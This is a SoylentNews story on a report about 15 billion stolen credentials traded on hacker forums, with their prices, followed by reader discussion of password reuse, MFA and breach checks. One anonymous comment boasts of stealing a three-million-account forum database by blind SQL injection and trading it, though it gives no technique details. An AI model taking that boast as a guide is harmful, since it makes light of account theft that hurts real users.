from the get-your-hot-fresh-credentials-here! dept.
15 Billion Credentials Currently Up for Grabs on Hacker Forums:
Fifteen billion usernames and passwords for a range of internet services are currently for sale on underground forums – shedding light on the sheer scope of compromised credentials that are fueling account takeovers on the internet.
A report released Wednesday — "From Exposure to Takeover" by the Digital Shadows Photon Research Team — found that 100,000 separate data breaches over a two-year period have yielded a 300 percent increase in stolen credentials, leaving a veritable bonanza of account details on dark-web hacker forums up for grabs.
Most of the credentials are from consumers, and while many are sold on forums—for an average price of $15.43—many also are given away for free by hackers, researchers found.
[...] The credentials being flogged online vary in access and price, according to the report. They include usernames and passwords for everything from bank or financial accounts–which comprised 25 percent of the credentials analyzed–to video- and music-streaming services, to antivirus programs.
Unsurprisingly, credentials for bank and other financial accounts are also the most expensive to purchase, selling for an average of $70.91 a piece, researchers found. Indeed, data that puts potential financial gain on the table tends to be the most valuable to threat actors.
Data for accessing antivirus programs earned the second-highest price on hacker forums, at an average of $21.67. Threat actors apparently find access to media streaming, social media, file sharing, virtual private networks (VPNs) and adult-content sites far less valuable, with these credentials traded "for significantly under $1" on forums, according to the report.
While consumer credentials comprised the bulk of those researchers tracked, organizations are not immune to the risk of credential theft and potential reuse for nefarious purposes, particularly if financial gain is involved. The report uncovered 2 million accounting email addresses exposed online, with those referencing "invoice" or "invoices" the most commonly advertised on hacker forums, researchers said.
(Score: 0) by Anonymous Coward on Thursday July 09 2020, @08:51AM (1 child)
Now I have to change the combination on my luggage
(Score: 0) by Anonymous Coward on Thursday July 09 2020, @09:12AM
If you post your password, it appears as askerisks. Like this:
(Score: 3, Insightful) by SomeGuy on Thursday July 09 2020, @11:42AM (3 children)
Safe and secure my fucking ass.
This is why I never even signed up for online banking. Good luck hacking paper transactions. Unfortunately with all the stupid shit that has been happening lately there has been increasing pressure to do things the "One True online-cell-phone-blue-leds-consumertard way"
(Score: 1, Informative) by Anonymous Coward on Thursday July 09 2020, @07:37PM (1 child)
And then someone else signs up for online access to your accounts and you are wide open. It's not a theoretical risk, it's happened before.
(Score: 3, Touché) by shortscreen on Thursday July 09 2020, @09:07PM
Is that the new marketing pitch?
"Download our app! ...Before someone else does on your behalf!"
(Score: 2) by el_oscuro on Saturday July 11 2020, @01:07AM
Of course, just because you aren't online doesn't mean your bank isn't. And it's website is probably full of SQLi, CRSF, long forgotten servers exposed to the Interwebs, etc. Just make sure you use a good password manager and have unique passwords:
https://xkcd.com/792/ [xkcd.com]
SoylentNews is Bacon! [nueskes.com]
(Score: 0) by Anonymous Coward on Thursday July 09 2020, @11:42AM (2 children)
..antivirus creds?!
(Score: 3, Insightful) by looorg on Thursday July 09 2020, @12:33PM
I found this one a bit odd to. But I don't think they care or want them for their anti-virus properties. I would see it more as intel on person or company, so you know what they are running so you can tailor future attacks of them better or to prevent or circumvent said protection. For most people just running MS defender (or whatever it's called again) is probably good enough, and it's free.
(Score: 2) by The Vocal Minority on Friday July 10 2020, @05:22AM
Password reuse
(Score: 2) by looorg on Thursday July 09 2020, @11:50AM
Looks like this would contain a lot of dupes. There is less then 8 billion people alive on the planet and only about half of them use and have access to the internet. I guess some people/companies will be better or worse then others. That said if there are multiple hackers selling them there is also the potential then of duplicate information.
(Score: 2, Interesting) by Anonymous Coward on Thursday July 09 2020, @04:36PM
hate to brag, but here goes.
I remember once in 2003 i think, i was bored one evening and hacked this chinese forum with 3.something million accounts in the database i took copy of.
I dont speak that language, so used it for the dictionaries and to exchange it for other databases.
Note how the country i was living in at the time didn't have laws against that.
It took about three minutes, no automated tools, no 0 days, just good old fashioned blind sql injection from a browser (its a fun game to play)
Moral of the story: you can make a database like that in a month or so, if you're average like me.
And yes, it'll be full of dupes.
And don't get me started on their pricing crap, this is lamers catering to lamers.
Hackers share. Criminals monetize.
(Score: 1) by hopdevil on Thursday July 09 2020, @04:58PM
Any account someone cares about should be protected with some form of multifactor auth. If the service (bank?) doesn't offer this option you are better off not using it.
The whole credential "stuffing" meta is loud noise in the security space. Folks should focus on meaningful problems, like actually updating their services when they have known issues. But instead they pay whack a mole caring about crap like this, wasting their time.
Who cares if you get billions of meaningless/forum passwords that probably aren't even valid anymore.
(Score: 2) by krishnoid on Thursday July 09 2020, @08:20PM (2 children)
They search for breaches like this, then allow you to run a security check [lastpass.com] on your usernames/passwords to see if any of them are included in a recent or older breach. If so, you can then change your credentials.
Since the decryption code runs completely browser-side, your unencrypted per-site passwords ostensibly never cross the wire from you to them (someone verified this, but I can't find the article). Of course, if your account's been compromised in a breach, they send that password from the copy they're holding onto of the various breached data dumps, from their side to your browser to run the security check browser-side. I'm pretty sure that's how they do it.
(Score: 0) by Anonymous Coward on Thursday July 09 2020, @11:20PM (1 child)
Just keep in believing that... of course, faith is a prerequisite since you can't audit the LastPass code as you can with Keepass.
(Score: 2) by krishnoid on Friday July 10 2020, @02:21AM
Either faith or Wireshark + Chrome debugger, both are good options.
(Score: 2) by bzipitidoo on Friday July 10 2020, @02:15AM
> particularly if financial gain is involved.
There it is. Web site and data erasure vandalism might be fun and all, but in most cases it doesn't make the perps any money.
A protection I rely on is not all this security theater, it's that most of my online accounts and activities aren't worth anything, that is, there's no way to get any money. Suppose someone hacked into my account here on SoylentNews, what could they do, really? Might be able to charge something to my credit card, but I trust SoylentNews doesn't keep that info. Right?
I haven't reused passwords for a decade now, and never for anything valuable, so figuring out this one won't help break into any of my other accounts on other sites. Been about that long since I went through the accounts where I had reused passwords and changed them all. So if a site screws up and leaks my password, no big deal for me.